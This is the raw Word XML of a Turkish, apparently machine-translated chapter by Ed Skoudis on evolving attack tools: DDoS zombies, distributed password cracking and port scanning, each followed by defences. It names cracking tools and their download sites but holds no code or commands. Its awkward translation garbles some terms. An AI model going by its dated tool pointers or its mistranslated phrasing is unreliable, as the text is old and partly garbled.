                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010065" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9. Riski Azaltma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010065 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pP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Pr="009966ED" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc10010036"/>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00687A48">
        <w:t xml:space="preserve"> Hacker Araçları ve Savunmaların Yeni Cinsi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ed Skoudis, CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ilgisayar saldırı araç ve tekniklerinde son teknoloji hızla ilerlemektedir. Evet, hizmet reddi saldırıları, şifre kırıcılar, port tarayıcılar, sniffers ve RootKits gibi geleneksel bilgisayar saldırısı araçlarının on yıllardır süren gerçek cephaneliğiyle karşı karşıyayız. Bununla birlikte, bu temel araç ve tekniklerin birçoğu son birkaç yıl içinde, onları her zamankinden daha güçlü kılan yeni özellikleri ve temel mimarileri ile bir rönesans gördü. Saldırganlar yaygın olarak kullanılan protokollere ve işletim sistemimizin kalbine derinlemesine giriyorlar. Büyüyen yeteneklerine ek olarak, bilgisayar saldırı araçlarının kullanımı giderek daha kolay hale geliyor. Her şeyi gördüğünüzü düşündüğünüzde, çoraplarınızı patlatan bir özellik ile yeni ve kullanımı kolay bir saldırı aracı kullanıma sunuldu. Gelişmişliği ve saldırı araçlarında kullanım kolaylığındaki bu sürekli artış ve zayıf hedeflerin internete yaygın biçimde yayılmasıyla birlikte, şimdi hacklemenin altın çağında yaşıyoruz. Bu bölümün amacı, bilgisayar saldırı araçlarının bu evrimindeki son olayları tanımlamaktır. Bilgisayarlarımız için en iyi savunmayı oluşturmak için kişinin rakiplerinin yeteneklerini ve taktiklerini anlamak gerekir. Bu amaca ulaşmak için, bu bölüm, her bir saldırı türü için savunma teknikleriyle birlikte, dağıtılmış saldırılar, aktif tarama ve çekirdek seviyesi RootKits dahil olmak üzere saldırı araçları arasında birkaç ilerleme alanı açıklamaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc10010037"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Dağıtılmış Saldırılar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bilgisayar saldırı araçlarının evrimindeki ana eğilimlerden biri, dağıtılmış saldırı mimarilerine doğru hareketidir. Esasen, saldırganlar saldırı yeteneklerini geliştirmek için İnternet'in dağıtılmış gücünü kullanıyor. Buradaki strateji oldukça basit, belki de aldatıcı bir biçimde bu dağıtılmış saldırı araçlarının bazılarının gücü göz önüne alındığında. Saldırgan, geleneksel bir bilgisayar saldırısı alır ve işi birçok sistem arasında böler. Saldırıda giderek daha fazla sistemle birlikte saldırganın başarı şansı artıyor. Bu dağıtılmış saldırılar, saldırganlara aşağıdakiler dahil birçok avantaj sunar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>• Tespit edilmeleri daha zor olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> • Saldırganın izini sürmek için genellikle işleri daha zorlaştırırlar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>• Saldırıyı hızlandırabilir ve belirli bir sonuca ulaşmak için gereken zamanı azaltabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> • Bir saldırganın bir hedefte daha fazla kaynak tüketmesine izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Öyleyse, saldırgan tüm makinelerin dağıtılmış bir saldırı başlatmasını nereden sağlıyor? Ne yazık ki, İnternet'te çok sayıda çok zayıf makine bulunmaktadır. Bu tür sistemlerin yöneticileri ve sahipleri, satıcılardan güvenlik yamaları uygulamazlar ve makinelerini güvenli bir şekilde yapılandırmazlar, çoğu zaman yalnızca kutudan çıktığı varsayılan konfigürasyonu kullanırlar. Üniversitelerdeki kötü güvenlikli bilgisayarlar, her büyüklükteki şirketler, devlet kurumları, sürekli İnternet bağlantısı olan evler ve başka yerlerdeki saldırganlar için kolay avlardır. Çok az yetenekli saldırganlar bile dünya çapında yüzlerce veya binlerce sistemi kolaylıkla alabilirler. Bu saldırganlar, Internet’in büyük alanlarını taramak için ev yapımı komut dosyaları ve Nessus güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="0053651D">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>açığı tarayıcısı (http://www.nessus.org) gibi ücretsiz araçlar da dahil olmak üzere otomatik güvenlik açığı tarama araçlarını kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Saldırganlar birçok klasik bilgisayar saldırı aracını dağınık bir paradigmaya uyarladılar. Bu bölüm, hizmet reddi saldırıları, dağıtılmış parola kırma, dağıtılmış bağlantı noktası taraması ve aktarma saldırıları da dahil olmak üzere en popüler dağıtılmış saldırı araçlarının çoğunu incelemektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="114" w:name="_Toc10010038"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.1. Dağıtılmış Hizmet Reddi Saldırıları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>En popüler ve yaygın olarak kullanılan dağıtılmış saldırı tekniklerinden biri dağıtılmış hizmet reddi (DDoS) saldırısıdır. Bir DDoS saldırısında, saldırgan çok sayıda sistemi devralır ve her sisteme zombi denilen uzaktan kumandalı bir program yükler. Zombiler sessizce komutları bekleyen arka planda koşuyorlar. Saldırgan, bu zombi sistemlerini bir makinede çalışan özel bir istemci programı kullanarak kontrol eder. Saldırgan çok sayıda zombiye komut göndermek için bir istemci makinesi kullanıyor ve onlara aynı anda bazı eylemler yapmalarını söylüyor. Bir DDoS saldırısında en yaygın eylem, paketleri olan bir kurbanı öldürmektir. Tüm zombiler eşzamanlı olarak paket bataklıkları başlattığında, kurban makinesi aniden sahte trafikte yıkanacak. Mağdurun iletişim bağlantısının tüm kapasitesi tükendiğinde, meşru bir kullanıcı trafiği sisteme ulaşamaz ve bu da hizmet reddine neden olur. DDoS saldırı metodolojisi, Şubat 2000'de, yüksek düzeyli İnternet sitelerinin saldırıya maruz kaldığı gün ışığı altındaydı. DDoS araçları daha da ıslatan yeni özelliklerle gelişmeye devam etti. En yeni nesil DDoS saldırıları, geniş kapsamlı göz atma yetenekleri içeriyor, böylece müşteriden zombilere ve zombilerden hedefe giden tüm trafik tuzak kaynağı bir adrese sahip. Bu nedenle, bir proje başladığında, araştırmacılar, saldırgandan zombilere, saldırganın yönlendirici sıçramasıyla saldırganın geçmişini izlemelidir. Bazı zombileri topladıktan sonra, araştırmacılar hala zombilerden müşteriye, sayısız atlama noktasına ve birden fazla İnternet servis sağlayıcısına (İSS'ler) devam etmelidir. Ayrıca, DDoS araçları zombilerin yerini gizlemek için şifreleme kullanıyor. İlk nesil DDoS araçlarında, istemci yazılımının çoğu, zombiler için bir ağ adresleri listesi içeren bir dosya içeriyordu. Böyle bir müşteriyi keşfederek, bir soruşturma ekibi zombileri hızla bulabilir ve ortadan kaldırabilir. En yeni nesil DDoS araçlarıyla, istemcideki ağ adreslerinin listesi güçlü bir şekilde şifrelenir, böylece müşteri zombilerin yerini vermez.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc10010039"/>
      <w:r>
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Dağıtılmış Hizmet Reddi Saldırılarına Karşı Savunma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">DDoS saldırıları da dahil olmak üzere herhangi bir pakete karşı savunma yapmak için, kritik ağ bağlantılarının basit saldırıları ortadan kaldırmak için yeterli bant genişliğine ve fazlalığına sahip olması sağlanmalıdır. Eğer bir ağ bağlantısı kritikse, en azından yedekli bir T1 bağlantısı olmalıdır, çünkü tüm düşük bağlantı hızları bir saldırgan tarafından kolayca çözülebilir. Bu bant genişliği taban çizgisi en düşük saldırgan seviyelerini ortadan kaldırırken, kişi yüz veya bin sisteme zombi kuran ve sisteminize işaret eden saldırganlara yetişmek için yeterli bant genişliğini satın alamayacak olması gerçeğiyle yüz yüze gelmelidir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Bir sistemin Internet’te kullanılabilir olması iş için kritik öneme sahipse, DDoS saldırılarını ele almak için ek teknikler kullanılması gerekir. Teknolojik açıdan bakıldığında, gelen oturumların sayısının yönetilmesine yardımcı olacak, böylece sunucularının ezilmemesi için trafik şekillendirme araçlarını düşünmek isteyebilir. Tabii ki, birinin bağlantısını kaldıran yeteri kadar büyük bir zombi kadrosu, trafiğin şekillendiricilerini bile ezebilir. Bu nedenle, bir saldırının ne zaman gerçekleşeceğini belirlemek için izinsiz giriş tespit sistemleri (IDS'ler) kullanılmalıdır. Bu IDS'ler, ağ hırsız </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:lastRenderedPageBreak/>
        <w:t>alarmları gibi davranır, IDS veritabanında depolanan yaygın saldırı imzalarıyla eşleşen trafiği izler. Prosedürel bir bakış açısına göre, IDS'den gelen bu tür alarmlar için bekleme modunda bir olay müdahale ekibi bulunmalıdır. Görev açısından kritik İnternet bağlantıları için, birinin ISS’nin kendi olay müdahale ekibi için cep telefonu ve çağrı cihazı numaraları olması gerekir. Bir DDoS saldırısı başladığında, birinin olay müdahale ekibi, ISS’nin olay müdahale ekibinin kuvvetlerini hızlı ve etkili bir şekilde yakalayabilmelidir. Bir kez uyarı verildiğinde, ISS, aktif DDoS saldırılarını engellemek için ağlarına filtreler yerleştirebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc10010040"/>
      <w:r>
        <w:t xml:space="preserve">2.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Dağıtılmış Şifre Kırma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Şifre kırma işleminin ardındaki fikir basit: şifreli bir şifre dosyası çalmak, bir şifre tahmin etmek, tahminde bulunmak ve sonucu çalınan şifreli dosyadaki değerle karşılaştırmak. Şifreli tahmin şifreli parola ile eşleşiyorsa, saldırgan parolayı belirlemiştir. İki değer eşleşmezse, saldırgan başka bir tahminde bulunur. Kullanıcı şifreleri genellikle kullanıcı kimlikleri, sözlük sözcükleri ve diğer karakterlerin tahmin edilebilir kombinasyonları olduğundan, bu teknik genellikle şifreleri belirlemede çok başarılıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve"> Geleneksel parola kırma araçları, parolaların hızlı ve verimli bir şekilde belirlenmesine yardımcı olmak için tahmin-şifreleme-karşılaştırma döngüsünü otomatikleştirir. Bu araçlar, kullanıcı kimliğinin varyasyonlarını, sözlük terimlerini ve şifreler için tahminlerini oluşturmak için olası tüm karakter kombinasyonlarının kaba kuvvet tahminini kullanır. Daha iyi şifre kırma araçları hibrit saldırılar yapabilir, karakterleri kaba bir şekilde standart sözlük kelimelerine ekleyebilir ve hazırlayabilir. Şifrelerin çoğu, başında veya sonunda basılan birkaç özel karakterden oluşan bir sözlük terimi olduğu için, karma teknik son derece kullanışlıdır. En iyi geleneksel şifre kırma araçlarından bazıları, Windows NT şifreleri için L0phtCrack (http://www.l0pht.com adresinde bulunur) ve UNIX ve Windows NT (http: / adresinde bulunabilir) de dahil olmak üzere çeşitli şifre türleri için Ripper John'dur. /www.openwall.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Daha kısa sürede daha fazla şifre tahminleri oluşturabilen ve kontrol edebilen araçlar, saldırganın kurtardığı daha fazla şifre ile sonuçlanacaktır. Geleneksel şifre kırma araçları, tahminleri şifrelemek için kullanılan şifreleme algoritmasının uygulanmasını optimize ederek bu hız sorununu giderir. Saldırganlar parola kırma yükünü çok sayıda bilgisayara dağıtarak daha da fazla hız kazanabilirler. Şifreleri daha hızlı bir şekilde kırmak için saldırganlar aynı anda şifreli bir şifreyle şifrelenmiş şifreleri çalmak için İnternet üzerinden yerleştirilmiş yüzlerce veya binlerce sistemi kullanacaklardır. Dağıtılmış şifre kırma uygulamak için, saldırgan, işi manuel olarak bölerek geleneksel bir şifre kırma aracını dağıtılmış bir şekilde kullanabilir. Örneğin, bir saldırganın, şifrelenmiş on şifreyle şifreli bir şifre kırmak istediği bir senaryo düşünün. Saldırgan, her biri şifreli bir şifre içeren, bölümü on parçaya bölebilir ve ardından her bir parçayı on makineden birine dağıtabilir. Her makine, söz konusu sisteme atanmış şifreli şifreyi kırmak için geleneksel bir şifre kırma aracı kullanır. Alternatif olarak, saldırgan makinelerin her birine şifrelenmiş on şifreyi yükleyebilir ve her bir geleneksel şifre kırma aracını, bir kaba kuvvet saldırısında bir sözlüğün veya belirli karakterlerin farklı bir kısmına odaklanarak farklı bir şifre kümesi tahmin etmesi için yapılandırabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Çalışmayı el ile bölmenin ve geleneksel bir şifre kırma aracı kullanmanın ötesinde, birkaç yerel dağıtılmış şifre kırma aracı piyasaya sürüldü. Bu araçlar, iş yükünün birkaç makineye yayılmasını otomatikleştirmeye ve saldırı ilerledikçe bilgi işlem kaynaklarını koordine etmeye yardımcı olur. En popüler dağıtılmış parola kırma araçlarından ikisi Mio-Star ve Saltine Cracker, ikisi de http://packetstorm.securify.com/distributed adresinde bulunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc10010041"/>
      <w:r>
        <w:t xml:space="preserve">2.4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Dağıtılmış Parola Kırmaya Karşı Savunmalar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Dağıtılmış parola kırmaya karşı savunmaları gerçekten geleneksel parola kırma için kullanılanlarla aynıdır: zayıf parolaları sisteminizden kaldırın. Dağıtılmış parola kırma işlemi, kırma işlemini hızlandırdığından, parolaların dağıtılmamış parola kırma işleminin hüküm sürdüğü günlerden daha zor olması gerekir. Kullanıcıları minimum uzunluktan daha büyük (dokuz karakterden daha büyük) şifreleri oluşturmaya zorlayan ve her bir şifreye rakam, harf ve özel karakterler içeren bir politika ile başlamalıdır. Kullanıcılar politikanın farkında olmalıdır; bu nedenle, tahmin edilebilecek şifrelerin önemini vurgulayan bir farkındalık programı anahtardır. Ayrıca, bir şifre politikasının uygulanmasına yardımcı olmak için, birinin kimlik doğrulama sunucularında şifre filtreleme araçları kullanmak isteyebilirsiniz. Bir kullanıcı yeni bir şifre belirlediğinde, bu araçlar şifre politikasına uygun olduğundan emin olmak için şifreyi kontrol eder. Şifre çok kısa ise veya rakam, harf ve özel karakter içermiyorsa, kullanıcıdan başka bir şifre seçmesi istenir. Windows NT Kaynak Seti'ndeki pass ﬁ lt.dll programı ve UNIX sistemlerindeki passwd + programı, bazı üçüncü taraf eklenti kimlik doğrulama ürünlerinde olduğu gibi bu özelliği uygular. Biri de, token tabanlı erişim teknolojilerini kullanarak standart şifrelerin çok hassas ortamlardan kaldırılmasını düşünmek isteyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00157AE0">
        <w:t>Son olarak, güvenlik personeli, saldırganın yapmadan önce zayıf olanlarını belirlemek için periyodik olarak bir kullanıcının kendi parolalarına karşı bir şifre kırma aracı çalıştırmalıdır. Zayıf şifreler bulunduğunda, kullanıcıları daha iyi bir şifre seçmeleri gerektiği konusunda bilgilendirmek için belirlenmiş ve onaylanmış bir süreç olmalıdır. Yönetimin bu önemli güvenlik programını anlamasını ve desteklemesini sağlamak için kurum içi şifre kırma projeleri gerçekleştirmeden önce uygun izinleri aldığınızdan emin olun. Yönetim onayının alınmaması, birinin kariyerini olumsuz yönde etkileyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc10010042"/>
      <w:r>
        <w:t xml:space="preserve">2.5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Dağıtılmış </w:t>
      </w:r>
      <w:r>
        <w:t>Port</w:t>
      </w:r>
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve"> Taraması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00157AE0">
        <w:t xml:space="preserve">Dağınık bir yaklaşıma kendini iyi veren bir başka saldırı tekniği de liman taraması. Bir bağlantı noktası, İnternet hizmetlerinin büyük çoğunluğu tarafından kullanılan iki iletişim kuralı olan İletim Denetimi Protokolünde (TCP) ve Kullanıcı Veri Birimi Protokolünde (UDP) önemli bir kavramdır. Bir ağdan TCP veya UDP trafiği alan her sunucu bir veya daha fazla bağlantı noktasını dinler. Bu bağlantı noktaları, paketlerin girip çıkabileceği bir makinedeki küçük sanal kapılar gibidir. Port numaraları, paketlerin yönlendirilmesi gereken bir sistemde adresler olarak hizmet eder. Bir yönetici bir ağ servisini herhangi bir porttan dinlemek için yapılandırabilirken, en yaygın servisler iyi bilinen portlardan dinler, böylece istemci yazılımı paketleri nereye göndereceğini bilir. Web sunucuları genellikle 80 numaralı TCP bağlantı noktasını dinlerken, İnternet posta sunucuları 25 numaralı TCP bağlantı noktasını dinler. Etki Alanı Adı Sunucuları, UDP bağlantı noktası 53'teki sorguları dinler. RFC 1700'deki http: / adresinde bulunan bir belge olan çeşitli hizmetlere yüzlerce başka bağlantı noktası atanmıştır. /www.ietf.org/rfc.html. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
